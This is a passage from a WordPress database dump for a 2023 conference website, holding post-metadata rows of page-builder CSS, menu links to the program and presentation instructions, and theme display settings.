!important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34972,5116,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34973,2082,'_wp_old_date','2023-06-27'),
(34974,2083,'_wp_old_date','2023-06-27'),
(34975,2346,'_wp_old_date','2023-06-27'),
(34976,2348,'_wp_old_date','2023-06-27'),
(34977,2349,'_wp_old_date','2023-06-27'),
(34978,2350,'_wp_old_date','2023-06-27'),
(34979,2351,'_wp_old_date','2023-06-27'),
(34980,2904,'_wp_old_date','2023-06-27'),
(34981,3556,'_wp_old_date','2023-06-27'),
(34982,4852,'_wp_old_date','2023-06-27'),
(34983,2084,'_wp_old_date','2023-06-27'),
(34984,2352,'_wp_old_date','2023-06-27'),
(34985,2281,'_wp_old_date','2023-06-27'),
(34986,2353,'_wp_old_date','2023-06-27'),
(34987,2354,'_wp_old_date','2023-06-27'),
(34988,2355,'_wp_old_date','2023-06-27'),
(34989,2282,'_wp_old_date','2023-06-27'),
(34990,2283,'_wp_old_date','2023-06-27'),
(34991,3671,'_wp_old_date','2023-06-27'),
(34992,3645,'_wp_old_date','2023-06-27'),
(34993,2284,'_wp_old_date','2023-06-27'),
(34994,2921,'_wp_old_date','2023-06-27'),
(34995,2285,'_wp_old_date','2023-06-27'),
(34996,2356,'_wp_old_date','2023-06-27'),
(34997,2357,'_wp_old_date','2023-06-27'),
(34998,2359,'_wp_old_date','2023-06-27'),
(34999,2358,'_wp_old_date','2023-06-27'),
(35000,2286,'_wp_old_date','2023-06-27'),
(35001,5117,'_menu_item_type','custom'),
(35002,5117,'_menu_item_menu_item_parent','2084'),
(35003,5117,'_menu_item_object_id','5117'),
(35004,5117,'_menu_item_object','custom'),
(35005,5117,'_menu_item_target','_blank'),
(35006,5117,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(35007,5117,'_menu_item_xfn',''),
(35008,5117,'_menu_item_url','https://gsw2023.com/wp-content/uploads/2023/09/GSW2023-Program-2023-09-1.pdf'),
(35010,5118,'_menu_item_type','custom'),
(35011,5118,'_menu_item_menu_item_parent','2084'),
(35012,5118,'_menu_item_object_id','5118'),
(35013,5118,'_menu_item_object','custom'),
(35014,5118,'_menu_item_target',''),
(35015,5118,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(35016,5118,'_menu_item_xfn',''),
(35017,5118,'_menu_item_url',''),
(35019,5119,'_menu_item_type','custom'),
(35020,5119,'_menu_item_menu_item_parent','2084'),
(35021,5119,'_menu_item_object_id','5119'),
(35022,5119,'_menu_item_object','custom'),
(35023,5119,'_menu_item_target',''),
(35024,5119,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(35025,5119,'_menu_item_xfn',''),
(35026,5119,'_menu_item_url','https://gsw2023.com/index.php/2023/08/13/instructions-for-oral-presentations/'),
(35028,5120,'_menu_item_type','custom'),
(35029,5120,'_menu_item_menu_item_parent','2084'),
(35030,5120,'_menu_item_object_id','5120'),
(35031,5120,'_menu_item_object','custom'),
(35032,5120,'_menu_item_target',''),
(35033,5120,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(35034,5120,'_menu_item_xfn',''),
(35035,5120,'_menu_item_url','https://gsw2023.com/index.php/2023/08/13/poster-design-and-presentation/'),
(35046,5122,'_edit_lock','1692780783:1'),
(35047,5122,'_edit_last','1'),
(35048,5125,'_wp_attached_file','2023/08/GSW2023-Program-2023-08-13.doc.pdf'),
(35049,5125,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1815451;}'),
(35050,5122,'_wp_page_template','template-microsite.php'),
(35053,5122,'_wpb_vc_js_status','false'),
(35054,5122,'_dt_sidebar_position','disabled'),
(35055,5122,'_dt_sidebar_widgetarea_id','sidebar_1'),
(35056,5122,'_dt_sidebar_hide_on_mobile','0'),
(35057,5122,'_dt_footer_show','0'),
(35058,5122,'_dt_footer_widgetarea_id','sidebar_2'),
(35059,5122,'_dt_footer_hide_on_mobile','0'),
(35060,5122,'_dt_header_title','fancy'),
(35061,5122,'_dt_header_background','normal'),
(35062,5122,'_dt_header_background_below_slideshow','disabled'),
(35063,5122,'_dt_header_transparent_bg_color_scheme','light'),
(35064,5122,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(35065,5122,'_dt_header_transparent_top_bar_bg_opacity','25'),
(35066,5122,'_dt_header_transparent_bg_color','#000000'),
(35067,5122,'_dt_header_transparent_bg_opacity','50'),
(35068,5122,'_dt_header_disabled_background','normal'),
(35069,5122,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(35070,5122,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(35071,5122,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(35072,5122,'_dt_header_disabled_transparent_bg_color','#000000'),
(35073,5122,'_dt_header_disabled_transparent_bg_opacity','50'),
(35074,5122,'_dt_page_overrides_top_margin',''),
(35075,5122,'_dt_page_overrides_right_margin',''),
(35076,5122,'_dt_page_overrides_bottom_margin',''),
(35077,5122,'_dt_page_overrides_left_margin',''),
(35078,5122,'_dt_mobile_page_padding_top',''),
(35079,5122,'_dt_mobile_page_padding_right',''),
(35080,5122,'_dt_mobile_page_padding_bottom',''),
(35081,5122,'_dt_mobile_page_padding_left',''),
(35082,5122,'_dt_post_options_back_button',''),
(35083,5122,'_dt_post_options_hide_thumbnail','1'),
(35084,5122,'_dt_post_options_related_mode','same'),
(35085,5122,'_dt_post_options_preview','normal'),
(35086,5122,'_dt_microsite_primary_menu',''),
(35087,5122,'_dt_microsite_split_left_menu',''),
(35088,5122,'_dt_microsite_split_right_menu',''),
(35089,5122,'_dt_microsite_mobile_menu',''),
(35092,5128,'_wpb_shortcodes_custom_css','.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35093,5129,'_wpb_shortcodes_custom_css','.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35094,5130,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35095,5131,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 115px !important;}.vc_custom_1689081933017{margin-top: 145px !important;}.vc_custom_1689081968974{margin-top: 160px !important;}.vc_custom_1689081968955{margin-top: 115px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35096,5132,'_edit_lock','1691975039:1'),
(35097,5132,'_edit_last','1'),
(35098,5132,'_wp_page_template','template-microsite.php'),
(35101,5132,'_wpb_vc_js_status','false'),
(35102,5132,'_dt_sidebar_position','disabled'),
(35103,5132,'_dt_sidebar_widgetarea_id','sidebar_1'),
(35104,5132,'_dt_sidebar_hide_on_mobile','0'),
(35105,5132,'_dt_footer_show','0'),
(35106,5132,'_dt_footer_widgetarea_id','sidebar_2'),
(35107,5132,'_dt_footer_hide_on_mobile','0'),
(35108,5132,'_dt_header_title','fancy'),
(35109,5132,'_dt_header_background','normal'),
(35110,5132,'_dt_header_background_below_slideshow','disabled'),
(35111,5132,'_dt_header_transparent_bg_color_scheme','light'),
(35112,5132,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(35113,5132,'_dt_header_transparent_top_bar_bg_opacity','25'),
(35114,5132,'_dt_header_transparent_bg_color','#000000'),
(35115,5132,'_dt_header_transparent_bg_opacity','50'),
(35116,5132,'_dt_header_disabled_background','normal'),
(35117,5132,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(35118,5132,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(35119,5132,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(35120,5132,'_dt_header_disabled_transparent_bg_color','#000000'),
(35121,5132,'_dt_header_disabled_transparent_bg_opacity','50'),
(35122,5132,'_dt_page_overrides_top_margin',''),
(35123,5132,'_dt_page_overrides_right_margin',''),
(35124,5132,'_dt_page_overrides_bottom_margin',''),
(35125,5132,'_dt_page_overrides_left_margin',''),
(35126,5132,'_dt_mobile_page_padding_top',''),
(35127,5132,'_dt_mobile_page_padding_right',''),
(35128,5132,'_dt_mobile_page_padding_bottom',''),
(35129,5132,'_dt_mobile_page_padding_left',''),
(35130,5132,'_dt_fancy_header_layout_heading',''),
(35131,5132,'_dt_fancy_header_title_aligment','center'),
(35132,5132,'_dt_fancy_header_height','300'),
(35133,5132,'_dt_fancy_header_padding-top','0px'),
